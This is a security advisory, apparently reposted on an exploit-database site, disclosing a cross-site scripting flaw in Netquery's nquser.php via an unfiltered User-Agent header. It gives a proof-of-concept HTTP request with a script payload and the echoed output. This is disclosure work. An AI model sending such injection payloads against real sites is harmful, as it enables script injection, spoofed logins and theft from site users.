Cross Site Scripting (XSS) Vulnerability in Netquery by "VIRtech"

2006.11.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

&#183;= Security Advisory =&#183; Issue: Cross Site Scripting (XSS) Vulnerability in Netquery by "VIRtech" Discovered Date: 04/10/2006 Author: Tal Argoni, LegendaryZion. [talargoni at gmail.com] Product Vendor: http://www.virtech.org Details: VIRtechs Netquery system is prone to a Cross Site Scripting Vulnerability. The vulnerability exists in "nquser.php" file, caused by the lack of Input Validation/Filtering of quotation and HTML characters in the header parameter "User-Agent:". Part of the http header: GET http://www.example.com/netquery/nquser.php HTTP/1.0 User-Agent: <script>alert('User-Agent:')</script> ... After send the crafted http header, nquser.php prints the following HTML code: ------------------------------------------------------------------------ ------------------------------------------ ... User Agent : <script>alert('User-Agent:')</script><br /> ... Successful exploitation may allow execution of script code. This could also be exploited to spoof the entire website's content, create fake login menu's for all the platform's users, commit Denial Of Service attacks and more... Proof Of Concept: GET http://www.example.com/netquery/nquser.php HTTP/1.0 Accept: */* Referer: http://www.example.com/ Accept-Language: en-us Pragma: no-cache User-Agent: <script>alert()</script> Host: virtech.org Proxy-Connection: Keep-Alive Cookie: e107_tdOffset=32630; e107_tdSetTime=1159974893; e107_tzOffset=420 Content-length: 0 Vulnerable systems: e107 Edition Postnuke Edition Xaraya Edition Xoops Edition Not vulnerable systems: Standalone Edition Fusion Edition for more details visit: www.zion-security.com Thanks, Tal Argoni, CEH www.zion-security.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top